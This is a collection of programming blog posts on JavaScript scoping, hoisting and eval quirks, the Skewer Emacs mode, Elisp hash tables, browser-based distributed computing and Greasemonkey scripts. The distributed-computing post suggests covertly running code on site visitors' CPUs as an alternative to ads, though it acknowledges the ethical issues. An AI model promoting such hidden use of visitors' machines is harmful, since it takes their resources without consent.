There’s no literal syntax for them, but these descriptors can be set with Object.defineProperty(). Conveniently, this function returns the object being modified.

foo(Object.defineProperty({}, 'bar', {value: true, writable: false}));

This creates a new object, sets bar to true, and locks that in by making the property read-only.
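The descriptors can be read back with Object.getOwnPropertyDescriptor(), which makes a handy sanity check. A small sketch (the variable names are arbitrary):

```javascript
var locked = Object.defineProperty({}, 'bar', {value: true, writable: false});
var descriptor = Object.getOwnPropertyDescriptor(locked, 'bar');
// descriptor.writable and descriptor.configurable are both false:
// anything left out of the defineProperty() call defaults to false.

var redefineError = null;
try {
    // Not configurable, so making it writable again is rejected.
    Object.defineProperty(locked, 'bar', {writable: true});
} catch (e) {
    redefineError = e.name;  // "TypeError"
}
```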

The fact that attempting to assign a read-only property silently fails instead of throwing an exception (outside of strict mode, at least) is probably another mistake in the language’s design. While this behavior is newbie-friendly, it allows bugs to slip by undetected, only to be found much later when they’re more expensive to address. It makes JavaScript programs more brittle.
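Strict mode is the exception here: the same assignment throws a TypeError in strict code. A quick sketch, where strictWrite() is just a throwaway name:

```javascript
function strictWrite(object) {
    'use strict';
    try {
        object.bar = false;
        return 'no error';
    } catch (e) {
        return e.name;
    }
}

var readOnly = Object.defineProperty({}, 'bar', {value: true, writable: false});
var getterOnly = {get bar() { return true; }};

strictWrite(readOnly);    // => "TypeError"
strictWrite(getterOnly);  // => "TypeError"
strictWrite({});          // => "no error"
```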

Existing objects: a third approach?

If you’re lazy and in a browser environment, you don’t even need to construct new objects to solve the problem. There are some already lying around! My favorite is HTML5’s localStorage. It stringifies all property assignments. This means that false becomes "false", which is truthy.

foo(localStorage);  // => true

This is arguably a third approach because the stringification behavior can’t be accomplished with either normal accessors or descriptors alone.

Raising the Dead with JavaScript

2012-11-20T00:00:00Z

After my last post, Gavin sent me this: Scope Cheatsheet. Besides its misleading wording, an interesting fact stood out and gave me another JavaScript challenge question. I’ll also show you how it allows JavaScript to raise the dead!

Background

Like its close cousin, Scheme, JavaScript is a Lisp-1: functions and variables share the same namespace. In Scheme, the define form defines new variables.

(define foo "Hello, world!")

Combined with the lambda form, it can be used to name functions,

(define square (lambda (x) (* x x)))

(square -4)  ;; => 16

The variable square is assigned to an anonymous function, and afterward it can be called as a function. Since this is so common, there’s a syntactic shorthand (sugar) for this,

(define (square x) (* x x))

Notice that the first argument to define is now a list rather than a symbol. This is a signal to define that a function is being defined, and that this should be expanded into the lambda example above. (Also note that the declaration mimics a function call, which is pretty neat.)

JavaScript also has syntactic sugar for the same purpose. The var statement establishes a binding in the current scope. This can be used to define both variables and functions, since they share a namespace. For convenience, in addition to defining an anonymous function, the function statement can be used to declare a variable and assign it a function. These definitions below are equivalent … most of the time.

var square = function(x) {
    return x * x;
}

function square(x) {
    return x * x;
}

The second definition is actually more magical than a syntactic shorthand, which leads into my quiz.

Quiz

function bar() {
    var foo = 0;
    function foo() {}
    return typeof foo;
}

bar(); // What does this return? Why?

function baz() {
    var foo;
    function foo() {}
    return typeof foo;
}

baz(); // How about now?

function quux() {
    var foo = 0;
    var foo = function () {}
    return typeof foo;
}

quux(); // How about now?

We have three functions, bar(), baz(), and quux(), each slightly different. Try to figure out the return value of each without running them in a JavaScript interpreter. Reading the cheatsheet should give you a good idea of the answer.

Answer

Figured it out? The first function, bar(), is the surprising one. If the special function form was merely syntactic sugar then all this means is that foo is redundantly declared (and re-assigned before accessing it, which the compiler could optimize). The final assignment is a function, so it should return 'function'.

However, this is not the case! This function returns 'number'. The first assignment listed in the code actually happens after the second assignment, the function definition. This is because functions defined using the special syntax are hoisted to the top of the function. The function assignments are evaluated before any other part of the function body. This is the extra magic behind the special function syntax.

The effect is more apparent when looking at the return value of quux(), which is 'function'. The special function syntax isn’t used so the assignments are performed in the order that they’re listed. This isn’t surprising, except for the fact that variables can be declared multiple times in a scope without any sort of warning.

The second function, baz(), returns 'function'. The function definition is still hoisted but the variable declaration performs no assignment. The function assignment is not overridden. Because of the lack of assignment, nothing actually happens at all for the variable declaration.
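
One way to picture the hoisting is to rewrite bar() and baz() by hand, in the order the assignments effectively happen. This is only a sketch of the observable behavior, not of what any particular engine does internally, and the names barHoisted and bazHoisted are made up for illustration.

```javascript
// Hand-reordered version of bar(): the function definition is applied
// first, then the `var foo = 0` assignment runs where it was written.
function barHoisted() {
    var foo;
    foo = function () {};  // the hoisted function definition
    foo = 0;               // the assignment from `var foo = 0`
    return typeof foo;
}

// Hand-reordered version of baz(): `var foo;` assigns nothing, so the
// hoisted function is still bound when typeof is evaluated.
function bazHoisted() {
    var foo;
    foo = function () {};  // the hoisted function definition
    return typeof foo;
}

barHoisted();  // => 'number'
bazHoisted();  // => 'function'
```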

Now, this seems to be a cloudy concept for even skilled programmers: a variable declaration like var foo = 0 accomplishes two separate things. The merge of these two tasks into a single statement is merely one of convenience.

1. Declaration: declares a variable, modifying the semantics of the function’s body. It changes what place in memory an identifier in the current scope will refer to. This is a compile-time activity. Nothing happens at run time; there is no when. When function definitions are hoisted, it’s the assignment (part 2) that gets hoisted. In C, variables are initially assigned to stack garbage (globals are zeroed). In JavaScript, variables are initially assigned to undefined.
2. Assignment: binds a variable to a new value. This is evaluated at run time. It matters when this happens in relation to other evaluations.
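
A small sketch of the split between the two: the declaration takes effect for the whole function body, while the assignment happens only when execution reaches it. The function name declareVsAssign is hypothetical.

```javascript
function declareVsAssign() {
    var before = x;  // x is already declared here, but still undefined
    var x = 5;       // the assignment happens at this point
    var after = x;
    return [before, after];
}

declareVsAssign();  // => [undefined, 5]
```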

Consider this,

var foo = foo;

The expression on the right-hand side is evaluated in the same scope as the variable declaration. foo is initially assigned to undefined, then it is re-assigned to undefined. This permits recursive functions to be defined with var — otherwise the identifier used to make the recursive call wouldn’t refer to the function itself.

var factorial = function(n) {
    if (n === 0)
        return 1;
    else
        return factorial(n - 1) * n;
};

In contrast, Lisp’s let does not evaluate the right-hand side within the scope of the let, so recursive definitions are not possible with a regular let. This is the purpose of letrec (Scheme) and labels (Common Lisp).

;; Compile error, x is unbound
(let ((x x))
  x)

Why function hoisting?

JavaScript’s original goal was to be easy for novices to program. I think that they wanted users to be able to define functions anywhere in a function (at the top level) without thinking about it. Novices generally don’t think of functions as values, so this is probably more intuitive for them. To accomplish this, the assignment needs to happen before the real body of the function. Unfortunately, this leads to surprising behavior, and, ultimately, it was probably a bad design choice.

Below, in any other language the function definition would be dead code, unreachable by any valid control flow, and the compiler would be free to toss it.

function foo() {
    return baz();
    function baz() { return 'Hello'; }
}

foo(); // => 'Hello'

But in JavaScript you can raise the dead!

JavaScript Debugging Challenge

2012-11-19T00:00:00Z

As I’ve been exploring JavaScript I’ve come up with a few interesting questions that expose some of JavaScript’s quirks. This is the first one, which I came up with over the weekend. Study it and try to come up with an answer before looking at the explanation below. Go ahead and use a JavaScript interpreter or debugger to poke at it if you need to.

var count = 4;

function foo() {
    var table = [count];

    /* Build the table. */
    while (count-- > 0) {
        table.push([]);
    }

    /* Fill it with numbers. */
    for (var count = 1; count < table.length; count++) {
        table[count].push(count);
    }
    return table;
}

foo(); // What does this return? And why?

When I originally came up with the problem, I just enabled impatient-mode in my editor buffer to share it with friends. It’s a really convenient alternative to pastebins!

Answer

If you’ve gotten this far either you figured it out or you gave up (hopefully not right away!). Without careful attention, the expected output would be [4, [1], [2], [3], [4]]. Create an array containing count, push on count arrays, and finally iterate over the whole thing. Seems simple.

However, the actual return value is [undefined], which at first may seem to defy logic. There’s a bit of a double-trick to this question due to the way I wrote it.

The first trick is that this might appear to be a quirk in the Array push() method. If you pass an array to push() does it actually concatenate the array, flattening out the result? If it did, pushing an empty array would result in nothing. This is not the case, fortunately.

var foo = [1, 2, 3];
foo.push([]);  // foo = [1, 2, 3, []]

The real quirk here is JavaScript’s strange scoping rules. JavaScript only has function scope ¹, not block scope like most other languages. A loop, including for, doesn’t get its own scope so the looping variables are actually hoisted into the function scope. For the first two uses of count, it isn’t actually a free variable like it appears to be. It refers to the for loop variable count even though it’s declared later in the function.

A variable doesn’t spring into existence at the place it’s declared — otherwise that would be a sort-of hidden nested scope. The binding’s extent is determined at compile-time (i.e. lexical scope). If the variable is declared anywhere in the function with var, it is bound for the entire body of the function. In contrast, C requires that variables be declared before they are used. This isn’t strictly necessary from the compiler’s point of view, but it keeps humans from making mistakes like above. A C variable “exists” (barring optimizations, it’s been allocated space on the stack) for the entire block it’s declared in, but since it can’t be referenced before the declaration that detail has no visible effect.

In the code above, because count was not assigned any value at the beginning of the function, it is initially bound to undefined, so the array starts out as [undefined]. In the while loop, undefined is converted to NaN when used as a number, and NaN > 0 is false, so zero arrays are pushed onto the table. In the final loop, count starts at 1, which is not less than the array’s length of 1, so nothing happens and [undefined] is returned.
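
To make the hoisting visible, here is a sketch of foo() rewritten with the declaration moved to where it effectively lives, followed by one possible fix. The names fooHoisted and fooFixed, and the choice to copy the global into a local n, are my own assumptions rather than anything from the original challenge.

```javascript
var count = 4;

// What foo() effectively does: the loop's `var count` is declared for
// the whole function body and shadows the global from the first line.
function fooHoisted() {
    var count;                // hoisted declaration, initially undefined
    var table = [count];      // [undefined]
    while (count-- > 0) {     // undefined converts to NaN; NaN > 0 is false
        table.push([]);
    }
    for (count = 1; count < table.length; count++) {  // 1 < 1 is false
        table[count].push(count);
    }
    return table;
}

// One possible fix: use distinct local names so nothing shadows the
// global, and copy the global so it isn't decremented as a side effect.
function fooFixed() {
    var n = count;
    var table = [n];
    while (n-- > 0) {
        table.push([]);
    }
    for (var i = 1; i < table.length; i++) {
        table[i].push(i);
    }
    return table;
}

fooHoisted();  // => [undefined]
fooFixed();    // => [4, [1], [2], [3], [4]]
```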

¹ JavaScript 1.7 actually has block scope when using let, but let is not widely supported yet.

JavaScript Strings as Arrays

2012-11-15T00:00:00Z

Lisp

One thing I enjoy about Common Lisp is its general treatment of sequences. (In fact, I wish it went further with it!) Functions that don’t depend on list-specific features generally work with any kind of sequence. For example, remove-duplicates doesn’t just work with lists, it works on any sequence.

(remove-duplicates '(a b b c))  ; list
=> (A B C)

(remove-duplicates #(a b b c))  ; array
=> #(A B C)

Functions like member and mapcar require lists because their behavior explicitly uses them. The general sequence version of these are find and map. Writing a new sequence function means sticking to these generic sequence functions, particularly elt and subseq rather than the more specialized accessors.

A string is just a one-dimensional array — a vector — with elements of the type character. This means all sequence functions also work on strings.

(make-array 10 :element-type 'character :initial-element #\a)
=> "aaaaaaaaaa"

(remove-duplicates "abbc")
=> "abc"

(map 'string #'char-upcase "foo")
=> "FOO"

(reverse "foo")
=> "oof"

There is no special set of functions just for operating on strings (except those for string-specific operations). Strings are as powerful and flexible as any other sequence. This is very convenient.

JavaScript

Unfortunately, JavaScript strings aren’t quite arrays. They look and act a little bit like arrays, but they’re missing a few of the useful methods.

var foo = "abcdef";

foo[1]
=> "b"

foo.length
=> 6

foo.reverse()  // error, no method 'reverse'

Notice that, when indexing, it returns a one-character string, not a single character. This is because there’s no character type in JavaScript. It would have been interesting if JavaScript had gone the Elisp route, where there’s no character type but instead characters are represented by integers, with some sort of character literal for using characters in code. This sort of thing can be emulated with the charCodeAt() method.
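
As a rough sketch of that emulation, a string can be turned into an array of integer character codes and back again. The helper names toCodes and fromCodes are hypothetical; charCodeAt() and String.fromCharCode() are the standard methods.

```javascript
// Convert a string to an array of integer character codes.
function toCodes(string) {
    var codes = [];
    for (var i = 0; i < string.length; i++) {
        codes.push(string.charCodeAt(i));
    }
    return codes;
}

// Convert an array of character codes back into a string.
function fromCodes(codes) {
    return String.fromCharCode.apply(null, codes);
}

toCodes("abc");            // => [97, 98, 99]
fromCodes([97, 98, 99]);   // => "abc"
```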

To work around the strings-are-not-arrays thing, strings can be converted to arrays with split(), manipulated as an array, and restored with join().

foo.split('').reverse().join('')
=> "fedcba"

The string method replace can act as a stand-in for map and filter. The replacement argument can be a function, which will be called on each match. If a single character at a time is selected for replacement then what’s left is the map method.

// Map over each character
foo.replace(/./g, function(c) {
    return String.fromCharCode(c.charCodeAt(0) + 10);
});
=> "klmnop"

For filter, an empty string would be returned in the case of the predicate returning false and the original match in the case of true.

foo.replace(/./g, function(c) {
    if ("xyeczd".indexOf(c) >= 0)
        return c;
    else
        return '';
});
=> "cde"

In most cases, typical use of regular expressions would serve the need for the filter() method, so this is mostly unnecessary. For example, the above could also be done like so,

foo.replace(/[^xyeczd]/g, '');

Another way to fix the missing methods would be to simply implement the Array methods for strings and add them to the String prototype, but that’s generally considered bad practice.
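
A middle ground, offered here as a sketch rather than something from the original post, is to borrow the generic Array methods with call() and leave String.prototype untouched. This should work for read-only methods such as map and filter. Methods that modify their receiver in place, such as reverse, are not suitable because strings are immutable.

```javascript
var foo = "abcdef";

// Borrow Array's map: the callback sees one-character strings.
var shifted = Array.prototype.map.call(foo, function (c) {
    return String.fromCharCode(c.charCodeAt(0) + 10);
}).join('');

// Borrow Array's filter with the same predicate as the replace() version.
var kept = Array.prototype.filter.call(foo, function (c) {
    return "xyeczd".indexOf(c) >= 0;
}).join('');

shifted;  // => "klmnop"
kept;     // => "cde"
```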

JavaScript's Quirky eval

2012-11-14T00:00:00Z

The infamous eval function is a strange beast in any language, but I think JavaScript’s is perhaps the strangest incarnation. Its very presence in a function foils any possibility of optimization, because it is capable of wreaking so much havoc.

The purpose of eval is to take an arbitrary data structure containing a program (usually a string) and evaluate it. Most of the time the use of eval indicates a bad program: its use is completely unnecessary, very slow, and probably dangerous. There are exceptions, like Skewer, where a REPL is being provided to a developer. Something needs to perform the “E” part of REPL.

If the language’s platform already has a parser and compiler/interpreter around, like an interpreted language, it’s most of the way to having an eval. eval just exposes the existing functionality directly to programs. In a brute-force, trivial approach, the string to be evaluated could be written to a file and loaded like a regular program.

Semantics

However, executing arbitrary code in an established context is non-trivial. When a program is compiled, the compiler maps out the program’s various lexical bindings at compile time. For example, when compiling C, a function’s variables become offsets from the stack pointer. As an optimization, unused variables can be discarded, saving precious stack space. If the code calling eval has been compiled like this and the evaluation is being done in the same lexical environment as the call, then eval needs to be able to access this mapping in order to map identifiers to bindings.

This complication can be avoided if the eval is explicitly done in the global context. For example, take Common Lisp’s eval.

Evaluates form in the current dynamic environment and the null lexical environment.

This means lexical bindings are not considered, only dynamic (global) bindings. In the expression below, foo is bound lexically so eval has no access to it. The compilation and optimization of this code is unaffected by the eval. It’s about as complicated as loading a new source file with load.

(let ((foo 'bar))
  (eval 'foo))  ; error, foo is unbound

Python and Ruby are similar, where eval is done in the global environment. In both cases, an evaluation environment can be passed explicitly as an additional argument.

In Perl things start to get a bit strange (string version). eval is done in the current lexical environment. ~~However, no assignments, either to change bindings or modify data structures, are visible outside of the eval.~~ (Fixed a string interpolation mistake.)

sub foo {
    my $bar = 10;
    eval '$bar = 5';
    return eval '$bar';
}

This function returns 5. The eval modified the lexically scoped $bar.

Note how short Lisp’s eval documentation is compared to Perl’s. Lisp’s eval semantics are dead simple — very important for such a dangerous function. Perl’s description is two orders of magnitude larger than Lisp’s and it still doesn’t fully document the feature.

JavaScript

JavaScript goes much further than all of this. Not only is eval done in the current lexical environment but it can introduce entirely new bindings!

function foo() {
    eval('var bar = 10');
    return bar;
}

This function returns 10. eval created a new lexical variable in foo at run time. Because the environment can be manipulated so drastically at run time, any hopes of effectively compiling foo are thrown out the window. To have an outside function modify the local environment is a severe side-effect. It essentially requires that JavaScript be interpreted rather than compiled. Along with the with statement, it’s strong evidence that JavaScript was at some point designed by novices.

eval also makes closures a lot heavier. Normally the compiler can determine at compile time which variables are being accessed by a function and minimize the environment captured by a closure. For example,

function foo(x) {
    var y = {x: x};
    return function() {
        return x * x;
    };
}

The function foo returns a closure capturing the bindings x and y. The compiler can prove that y is never accessed by the closure and omit it, freeing the object bound to y for garbage collection. However, if eval is present, anything could be accessed at any time and the compiler can prove nothing. For example,

function foo(x) {
    return function() {
        return eval('x * x');
    };
}

The variable x is never accessed lexically, but the eval can tease it out at run time. The expression foo(3)() will evaluate to 9, showing that anything exposed to the closure is not free to be garbage collected as long as the closure is accessible.

If that’s where the story ended, JavaScript optimization would look pretty bleak. Any function call could be a call to eval and so any time we call another function it may stomp all over the local environment, preventing the compiler from proving anything useful. For example,

var secretEval = eval;
function foo(string) {
    // ...
    secretEval(string);
    // ...
}

There’s good news and bad news. The good news is that this is not the case in the above example. string will be evaluated in the global environment, not the local environment. The bad news is that this is because of an obscure, complicated concept of indirect and direct evals.

In general, when eval is called by a name other than “eval” it is an indirect call and is performed in the global environment (see the linked article for a more exact description). This means the compiler can tell at compile time whether or not eval will be evaluating in the lexical environment. If not, it’s free to make optimizations that eval would otherwise prohibit. Whew!
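
The difference can be observed with a pair of small functions. This is a minimal sketch with hypothetical names (directCall, indirectCall, hiddenLocal), and it assumes there is no global variable called hiddenLocal.

```javascript
function directCall() {
    var hiddenLocal = 'local';
    // Called by the name "eval": a direct call, evaluated in this scope.
    return eval('typeof hiddenLocal');
}

function indirectCall() {
    var hiddenLocal = 'local';
    var secretEval = eval;
    // Called by another name: an indirect call, evaluated in the global
    // environment, where (by assumption) no hiddenLocal exists.
    return secretEval('typeof hiddenLocal');
}

directCall();    // => 'string'
indirectCall();  // => 'undefined'
```

Using typeof inside the evaluated string keeps the indirect case from throwing a ReferenceError, so both results can be compared directly.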

Strict mode

To address eval’s problems a bit further, along with some other problems, ECMAScript 5 introduced strict mode. Strict mode modifies JavaScript’s semantics so that it’s a more robust and compiler-friendly language.

In strict mode, eval still uses the local environment when called directly but it gets its own nested environment. New bindings are created in this nested environment, which is discarded when evaluation is complete. JavaScript’s eval is still quirky, but less so than before.
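
A minimal sketch of the strict-mode behavior, using a hypothetical function strictFoo that mirrors the earlier foo example: the binding created by eval is usable inside the evaluated code but does not leak into the calling function.

```javascript
function strictFoo() {
    'use strict';
    // bar exists inside the eval's own nested environment...
    var result = eval('var bar = 10; bar');
    // ...but is gone once the evaluation is complete.
    return [result, typeof bar];
}

strictFoo();  // => [10, 'undefined']
```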

Skewer: Emacs Live Browser Interaction

2012-10-31T00:00:00Z

Inspired by Emacs Rocks! Episode 11 on swank-js, I spent the last week writing a new extension to Emacs to improve support for web development. It’s called Skewer and it allows you to interact with a browser like you would an inferior Lisp process. It’s written in pure Emacs Lisp, operates as a servlet for my Elisp webserver, and requires no special support from your browser or any other external programs, making it portable and very easy to set up.

Repository

Available on MELPA
https://github.com/skeeto/skewer-mode

Demo

(No audio.)

The video is also on YouTube.

It works a little bit like impatient-mode. First, the browser makes a long poll to Emacs. When you’re ready to send code to the browser to evaluate, Emacs wraps the expression in a bit of JSON and sends it to the browser. The browser responds with the result and starts another long poll.

As such, the browser doesn’t need to do anything special to support Skewer. If it can run jQuery, it can be skewered. I’ve tested it and found it working successfully on the latest versions of all the major browsers, including you-know-who.

To properly grab expressions around/before the point I’m using the amazing js2-mode, originally written by the famous Steve Yegge. If you’re developing JavaScript you should be using this mode anyway! I thought I was clever with my psl-mode, writing my own full language parser. Steve Yegge did the same thing on a much larger scale three years ago with js2-mode. It includes an entire JavaScript 1.8 parser so the mode has full semantic understanding of the language. For Skewer, I use js2-mode’s functions to access the AST and extract complete, valid expressions.

What’s wrong with swank-js?

Skewer provides nearly the same functionality as swank-js, a JavaScript back-end to SLIME. At a glance my extension seems redundant.

The problem with swank-js is the complicated setup. It requires a cooperating Node.js server, a particular version of SLIME, and a lot of patience. I could never get it working, and if I did I wouldn’t want to have to do all that setup again on another computer. In contrast, Skewer is just another Emacs package, no special setup needed. Thanks to package.el, installing and using it should be no more difficult than installing any other package.

Most importantly, with Skewer I can capture the setup in my .emacs.d repository where it will automatically work across any operating system, so long as it has Emacs installed.

Getting into JavaScript

I already used Skewer to develop a little boids toy, which I’m using to demonstrate the mode (the video). Unlike my previous experiences in web development, this was extremely enjoyable — probably because it felt a lot like I was writing Lisp. And unlike any Lisp I’ve used so far, I had a canvas to draw on with my live code. That’s a satisfying tool to have.

Due to those prior poor experiences, I had avoided web development for a long time. But now that I have some decent tools configured I’m going to get into it more. In fact, I’ve decided I’m completely done with writing Java applets. Bounze will have been my last one.

This has become a pattern for me. When I want to start using a new language or platform I need to figure out a work-flow with Emacs. This involves trying out new modes, reading about how other people do it, and, ultimately, when I find out the existing stuff is inadequate, I build my own extensions to create the work-flow I desire. I did this with Java, recently with psl-mode (which was to be expected), and now web development.

During my recent proper introduction to JavaScript, undertaken in order to create and demo Skewer mode idiomatically, perhaps the most exciting discovery this past week was the JavaScript community itself. I’ve been mostly unaware of this community and taking my first steps into it has been enlightening.

JavaScript had a rough start. It was designed in a rush by developers who, at the time, didn’t quite understand the consequences of their design decisions, and later extended by similar people. The name of the language itself is evidence of this. Fortunately some really smart people jumped on board along the way (including Guy Steele of Lisp fame) and have tried to undo, or at least mitigate, the mistakes.

Due to the coarseness of the language, the JavaScript community is actually a lot like the Elisp community, but on a larger scale: there’s still a whole lot of frontier to explore and it’s pretty easy to make a noticeable splash.

Here’s to splashing!

Elisp Printed Hash Tables

2010-06-07T00:00:00Z

A printed hash table representation is pretty new to Elisp, and a bit late. As far as I know Elisp didn't come with a way to print, and read back in, a hash table without rolling your own (like Jared Dilettante was doing with a Data::Dumper style output), until 23.1 in July 2009. This is when json.el was first included with Emacs, for dumping to and reading from JSON.

(require 'json)

(setq hash (make-hash-table))
(puthash "key1" "data1" hash)
(puthash "key2" "data2" hash)

(insert "\n;; " (json-encode hash))
;; {"key2":"data2", "key1":"data1"}

Just a month ago Emacs 23.2 came out, very silently including a new printed representation for hash tables with a #s hash notation.

#s(hash-table data ("key1" "data1" "key2" "data2"))

With this, hash tables can be printed and read as part of normal s-expressions with the standard Lisp reader and printer functions. It seems heavy, having to write out "hash-table" in there, but I think it's because the #s notation will be used to create printed forms of other Lisp objects that currently do not have one.

JavaScript Distributed Computing

2009-06-09T00:00:00Z

I'm not the first to come across this idea: the browser could be used as part of a distributed computing system. A web server hands out JavaScript and the browser runs the script and reports the results back to the server. The browser is a portable, widely available platform so just about anyone can easily contribute, possibly without even knowing.

Browsers aren't really expecting this sort of thing. They will complain if a script is running for too long. If you tell Firefox to continue running the script anyway, it will lock up until the script is done (or when it complains again). This can be worked around by writing a simple scheduler with setTimeout().
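
A scheduler along those lines might look like the following sketch. The function name runInChunks and its parameters are hypothetical, not taken from any code in this article. It does a fixed number of work items per turn, then yields to the browser with setTimeout() before continuing.

```javascript
// Call work(i) for i in [0, total), at most chunkSize calls per turn,
// yielding to the event loop between chunks. done() is called at the end.
function runInChunks(total, chunkSize, work, done) {
    var i = 0;
    function step() {
        var end = Math.min(i + chunkSize, total);
        for (; i < end; i++) {
            work(i);
        }
        if (i < total) {
            setTimeout(step, 0);  // let the browser breathe, then resume
        } else {
            done();
        }
    }
    step();  // the first chunk runs immediately
}

// Example use: sum the integers below 1000, 100 at a time.
// var sum = 0;
// runInChunks(1000, 100, function (i) { sum += i; }, function () {
//     console.log(sum);
// });
```

The chunk size is the tuning knob: larger chunks mean less scheduling overhead but longer stretches where the page is unresponsive.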

This could also potentially be used as an alternative to advertising. Instead of selling advertising space, a website operator could sell visitors' CPU time by including a little snippet of code. This may be more successful, because most visitors would be unaware of it, making it less intrusive. It will be less likely to be blocked. Of course, there are ethical issues with this. In fact, there is already a company doing this with secret Java applets.

There are two serious constraints on using JavaScript in a browser as a distributed computing platform:

Low bandwidth. There isn't a lot of opportunity to transfer data between the server and the node, and nodes can't talk to each other. The data needed by a node must be small. The results data must also be small.

Short computational units. The JavaScript in the browser has no way to store its running state between browser sessions, so it must rely on the server for this. This means that the units of work must be able to be completed within a short period of time, a few minutes at the most on a normal computer.

A lot of problems won't fit inside these limitations. One that I thought might was a Mersenne prime search. A Mersenne prime is a prime of the form,

2ⁿ - 1

So even though the largest known Mersenne prime has nearly 13 million digits (about 5 MB just to store the entire number), it can be described by its exponent, 43,112,609, which is small enough to fit in a 4-byte integer. The result of a calculation, a probabilistic primality test, is a "yes" or "no". One bit. It fits the first constraint very well.

However, the smallest amount of work a node can do is an entire primality test. If we break it down any further, the prime will have been expanded and we will not fit the first constraint. There will be too much data. To see how possible it might be, I implemented it, which you can try out here,

/download/mersenne/ (sloppy code warning!)

I modified an existing JavaScript bigint library, which allowed me to get it up and running quickly. After you receive the page, your browser will run the Miller-Rabin primality test on 2^9941 - 1. You can edit the source HTML to try a different exponent. Running it on several of my computers on different browsers, it took anywhere from an hour to 8 hours. And that's only with an exponent of 9941. It's an unsuitable problem.
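
For reference, here is a minimal sketch of a Miller-Rabin test on a Mersenne number. It is not the code from the download above: it assumes the built-in BigInt type (which did not exist when this was written) instead of a bigint library, and the function names and the fixed list of small prime bases are my own choices.

```javascript
// Modular exponentiation: (base ** exp) % mod, all BigInt.
function modPow(base, exp, mod) {
    var result = 1n;
    base %= mod;
    while (exp > 0n) {
        if (exp & 1n) result = (result * base) % mod;
        base = (base * base) % mod;
        exp >>= 1n;
    }
    return result;
}

// Miller-Rabin with fixed bases, which must be small primes.
function isProbablePrime(n, bases) {
    if (n < 2n) return false;
    for (var k = 0; k < bases.length; k++) {
        if (n === bases[k]) return true;
        if (n % bases[k] === 0n) return false;
    }
    // Write n - 1 as d * 2^r with d odd.
    var d = n - 1n, r = 0;
    while ((d & 1n) === 0n) { d >>= 1n; r++; }
    for (var i = 0; i < bases.length; i++) {
        var x = modPow(bases[i], d, n);
        if (x === 1n || x === n - 1n) continue;
        var witness = true;  // assume this base proves n composite
        for (var j = 1; j < r; j++) {
            x = (x * x) % n;
            if (x === n - 1n) { witness = false; break; }
        }
        if (witness) return false;
    }
    return true;  // probably prime
}

// Test 2^p - 1. Base 2 alone never rejects 2^p - 1 when p is prime,
// so the other bases are doing the real work here.
function isMersenneProbablePrime(p) {
    var n = (1n << BigInt(p)) - 1n;
    return isProbablePrime(n, [2n, 3n, 5n, 7n]);
}

isMersenneProbablePrime(13);  // => true  (8191 is prime)
isMersenneProbablePrime(11);  // => false (2047 = 23 * 89)
```

Note that the input to the whole computation is still just the exponent p, and the output is a single boolean, which is what makes the problem fit the bandwidth constraint.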

It would be neat to see a browser computing grid in action, but I can't think of a problem to solve with it.

Greasemonkey User Scripts

2009-05-05T00:00:00Z

I have recently been playing around with Greasemonkey, a great Firefox add-on that gives users a lot of control over how a website is displayed. It works by having the user provide a bit of JavaScript that runs when a website is rendered. The user doesn't actually have to write the script, but can find one in various script repositories.

When I looked around, I couldn't find scripts to do some things I wanted, so I started writing my own. Now that I have started that habit I see uses for user scripts all over the place. Suddenly I can fix anything I find annoying on the web. It's very empowering.

Of course, Firefox add-ons can do anything a user script can do. But Greasemonkey user scripts are lightweight, more secure (due to being less powerful), easier to write, and don't require a browser restart to install and uninstall.

I posted my scripts on userscripts.org so that people could find them easily, but I always like to host these things locally, too. ~~You can find it under /userscripts here.~~ Don't forget to review the source before you install it! That is, unless you automatically trust me and my website's security. I, or an infiltrator, could slip something sneaky in there.

I actually first used Greasemonkey back in 2005, but they had some very serious security issues back in those days. It was bad enough that I just uninstalled it, which was actually recommended by the Greasemonkey people themselves. So, four years later I am back to check it out.

The first user script I wrote was in response to a "feature" on TV Tropes. In addition to the overall cruddiness of the website, they started adding "folders" to the information on long pages. It folds up all of the information behind little clickable widgets. It uses CSS to hide the information and Javascript to reveal it by adjusting those styles on the fly. If you have a browser with CSS support but not Javascript (or have it disabled like I did), you won't ever be able to see the information in the browser. As of this writing the Jumping the Shark article uses this. Take a look.

This is an awful idea! It critically breaks the usability of the page. And what's the point? We already have a vertical scrollbar to control the display. Unfortunately, a lot of clueless people seem to like this sort of behavior — because it's flashy — so we will probably only see more of it on the web in the future.

My TV Tropes user script is simple: it scrapes off some of the CSS. Specifically, the "folder" CSS. That's it! Someone who already knows how to make user scripts could probably put this together in less than 15 minutes.

If you want to tackle web annoyances, learn Greasemonkey!